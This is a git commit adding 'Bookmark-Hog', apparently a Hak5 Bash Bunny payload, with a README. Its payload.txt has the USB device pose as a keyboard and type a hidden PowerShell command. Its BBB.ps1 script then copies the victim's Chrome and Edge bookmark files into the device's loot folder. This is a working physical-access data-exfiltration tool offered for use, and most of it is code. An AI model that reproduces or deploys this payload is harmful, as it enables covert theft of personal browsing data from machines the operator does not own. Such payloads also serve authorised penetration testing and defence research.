New payload - Bookmark-Hog (#543)

2022-08-30 10:56:42 -04:00 · 2022-08-30 10:56:42 -04:00 · 8e322706bc
parent b10a644277
commit 8e322706bc
3 changed files with 173 additions and 0 deletions
--- a/payloads/library/exfiltration/Bookmark-Hog/BBB.ps1
+++ b/payloads/library/exfiltration/Bookmark-Hog/BBB.ps1
@ -0,0 +1,47 @@
+#Bookmark-Hog
+
+# Get Drive Letter
+$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
+
+# Test if directory exists if not create directory in loot folder to store file
+$TARGETDIR = "$bb\loot\Bookmark-Hog\$env:computername\Chromebm.txt"
+$TARGETDIR2 = "$bb\loot\Bookmark-Hog\$env:computername\Edgebm.txt"
+
+if(!(Test-Path -Path $TARGETDIR )){
+    mkdir $TARGETDIR
+}
+
+# See if file is a thing
+Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
+
+#If the file does not exist, write to host.
+if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
+     try {
+         Write-Host "The chrome bookmark file has not been found. "
+     }
+     catch {
+         throw $_.Exception.Message
+     }
+ }
+ # Copy Chrome Bookmarks to Bash Bunny
+  else {
+     Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$TARGETDIR" 
+ }
+
+
+# See if file is a thing
+Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2" 
+
+#If the file does not exist, write to host.
+if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
+    try {
+        Write-Host "The edge bookmark file has not been found. "
+    }
+    catch {
+        throw $_.Exception.Message
+    }
+}
+ # Copy Chrome Bookmarks to Bash Bunny
+ else {
+    Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2" 
+}
--- a/payloads/library/exfiltration/Bookmark-Hog/README.md
+++ b/payloads/library/exfiltration/Bookmark-Hog/README.md
@ -0,0 +1,104 @@
+<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?" width="200">
+<h1 align="center">
+  <a href="https://git.io/typing-svg">
+    <img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈&center=true&size=30">
+  </a>
+</h1>
+
+<!-- TABLE OF CONTENTS -->
+<details>
+  <summary>Table of Contents</summary>
+  <ol>
+    <li><a href="#Description">Description</a></li>
+    <li><a href="#getting-started">Getting Started</a></li>
+    <li><a href="#Contributing">Contributing</a></li>
+    <li><a href="#Version-History">Version History</a></li>
+    <li><a href="#Contact">Contact</a></li>
+    <li><a href="#Acknowledgments">Acknowledgments</a></li>
+  </ol>
+</details>
+
+# Bookmark-Hog
+
+A payload to exfiltrate bookmarks of the 2 most popular browsers
+
+## Description
+
+This payload will enumerate through the browser directories, looking for the file that stores the bookmark history 
+These files will be saved to the bash bunny in the loot directory
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+### Executing program
+
+* Plug in your device
+* Let the magic happen
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Contributing
+
+All contributors names will be listed here
+
+atomiczsec
+
+I am Jakoby
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Version History
+
+* 0.1
+    * Initial Release
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- CONTACT -->
+## Contact
+
+<h2 align="center">📱 My Socials 📱</h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
+      </a>
+      <br>YouTube
+    </td>
+    <td align="center" width="96">
+      <a href="https://twitter.com/atomiczsec">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
+      </a>
+      <br>Twitter
+    </td>
+    <td align="center" width="96">
+      <a href="https://discord.gg/MYYER2ZcJF">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
+      </a>
+      <br>I-Am-Jakoby's Discord
+    </td>
+  </tr>
+</table>
+</div>
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+
+
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- ACKNOWLEDGMENTS -->
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+<p align="right">(<a href="#top">back to top</a>)</p>
--- a/payloads/library/exfiltration/Bookmark-Hog/payload.txt
+++ b/payloads/library/exfiltration/Bookmark-Hog/payload.txt
@ -0,0 +1,22 @@
+# Title:         Bookmark-Hog
+# Description:   This payload is meant to exfiltrate bookmarks to the bash bunny.
+# Author:        atomiczsec
+# Version:       1.0
+# Category:      Exfiltration
+# Attackmodes:   HID, Storage
+# Target:        Windows 10, 11
+
+LED SETUP
+
+GET SWITCH_POSITION
+
+ATTACKMODE HID STORAGE
+
+LED STAGE1
+
+QUACK DELAY 3000
+QUACK GUI r
+QUACK DELAY 100
+LED STAGE2
+QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\BBB.ps1')"
+QUACK ENTER